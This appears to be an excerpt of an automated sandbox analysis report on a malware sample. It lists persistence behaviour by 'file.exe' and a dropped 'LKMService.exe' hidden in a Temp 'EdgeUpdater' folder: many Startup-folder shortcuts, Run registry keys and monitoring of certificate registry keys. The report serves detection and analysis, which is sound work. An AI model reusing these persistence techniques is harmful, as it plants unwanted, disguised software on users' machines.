Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4b6a2fbd44d4fb2aa670d38ec1c4171.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b86cea4c7b9b4145a39b8715df791841.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_45ea511973cf478ba32bd0e0968190a7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_38cb31f846c74a0983c4f6c57afbdef9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e3c5548913e44c70a6c8fd8334fb936e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b47ea55076ae47399a1e118ab814c225.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c42d1852306b4504949cf6ca50578a33.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5c3891242d6e480991eaf7fb6a231975.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_366bac00d9ea42899c996b8ef7ae09ac.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ac7edd4c5ae54bc6b3380c57aecd027e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5ebe19dd30dc44edb6e3a49112c74b32.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_273b67199e3d4092b2105bd699526255.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a4812cb23b84f2e95f65dd4fa039549.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_350e2bcd0734472ab3901d5d2bd51ce7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2a0472589b8d49d580c1e14bce93ad8e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4519eb4cbc3c4d47bc3f7d639374071e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fb0273bb2b644a781d6c331178faddc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a9acfe3ccaec43ec9fdb813dab7ecbc6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_664fbf9e6e51431582fc5b1c0af457e3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1256348d10fc4ee0a7d0b9467a5418cd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e28183393aa348268ac8c573d5502b1f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0afece5840df4176899b844c1d5c9e69.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_125c1fe126e14d0d9fac45186eb04ff2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1e1d845915194135b12cc660ab6ebb4d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5bac9b12a35b4a8abee5d849350d4cfe.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ece45098690b4892864172a47d52cf8f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ff0b2c7a1da5470f8bdba4c7d0d1baed.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_320177e11fbb4babb85356abf55e0b99.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1e52c3798cb4024a6fd45d78ef65340.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_daef8724ed6347b895466620f5e665dc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_640dcb995346434c96839d2d83742599.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bff12266345e44a9b496133053c7f263.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b86ceab65de49c49beb8cb12c410381.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0cda6700e20438397545917b25b60bc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_167367bbfef04c4481dd697d094f8b63.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ae0f52f74f9348768b6eef36b80bbf5a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c851befd38d2427d8d269a98d294e3a5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f2bed5be759242edaf28dfd23e60fbb4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dcfe5a74920d4318a87257b3fafacc01.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34321b2281664b27a83ad01fa13bc0b3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d7a9e1f71e674259bc6770546141070b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bd6a94e54b01443cb6021458218b9ec9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_92941d340d434f5a9e68942462246f22.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_39159887f3204d8e8fefe4810af69af9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ae36cbf57bba423faea52eafbd67d52e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c282045190e841bc8018c75ed34f2677.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0760bad1395b4e6d9229cd7290d0bfd6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dfb16a4487ec4beaa1b1d78b04a99008.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7dd43a72555644e192d6a68d17c5b960.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10b941cabe434db3b065299af6c79bcc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5e5ea231ea4e4ffca8c6bf1323ff31d9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_82d2f3a5637a4c2080f8baf85285f4da.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_13c709e1909a4ba0924f2c6a918a488b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_190b0e7ea3364aab9ab02f751d3fa36e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3facc06f597b4bdd8a739c4670a80246.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_575324352462440e8b12a1e982435c9f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b3aacf1dbd5e4d3392e7bf3232dc57cf.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d931f0e9333144269687eae7d6b8ea59.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_03b6bab1fde244d28447e08c325e4a07.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3f0be1f466f84181ba333a6df3a516b0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d65cc542a34b4da38cbe8960d3e8424b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a36516a4c8cc471293cc601e09c286c1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5176400ea1bc450d9688dfefc752db32.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ef824ea0ab1e402c87f6f1bf359c96ac.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_162795bda5fa46828118263a399b42b7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1754dd6b32b448c08e8885636a675bf1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_41af698d57e841f7a97a18d762254e95.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1e404b68114e438ea737eac2a2fab6e6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8cc3aebaced943f9b806b6cb451bf3a1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1bdb7ca33394ca6a68f9cffd90716fd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9435b417d7174818bc725d53c084ad74.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a146399d9db47d9bee8edf48f4efb76.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_14b6d09a20e948a5a8f9a9a0b7ab87d8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4bd582915a8c4bfb97fa91bd4328b1e0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5f8ba6889c254ba58b476a41f22439d0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b26e46310f2a4f6d8edad21044105f29.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34d44aca968f4415baf4a94db6ea8d00.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c74ff54973c3482b858e648393044bee.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d62bbecc00364362b14e059934ea6472.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7e2b335500384003acb1b579c9875623.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90a28a31d7ae459b91fdf94045fbc96f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_97c93c184ade485a8a064ccc1c9187f0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acf87a42bf4b41579f8273f723e7d17d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ffdc1a459af0433ab31a6499a0a0e333.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4514974b9824faaadddc6ac58593bda.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_78f230ec7acf4b448fe76a84bdefb047.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9a583ee01cd34464bae9e4d0a80d99f0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8e2bc38730ba4c8c9b07b18681955891.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_66e1e244985c436985d58ec91647105d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0f1fa8cf3f2b4bf2a7574c0e4b2f376c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9de743c8e437443b88530f3fe7688358.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0c043eea2c7a4b4182fb993ee1edaf06.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_43e7d75dce6f4a87860706dd852faaba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f4d1bce3b46d49aab44bc8d0febe542e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61650c5e6ecd479ea5598de8190804d8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_98e24bddde1946faad7ab9a2f3a7aa3f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17f7fee4e5104f968c19a4a9e6178d67.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3be1c6c02fcd4cbca121074b848dedc4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e7e24d5a8d344423913a68fb440786f2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_54d66de5935d4ecabaf6a00f0432d71e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6d091b3309424e76ae47b7d1edd0307f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3c9988356a104a099db4a06d01085945.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2bce08fd547d45aea7adcaabe45db843.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
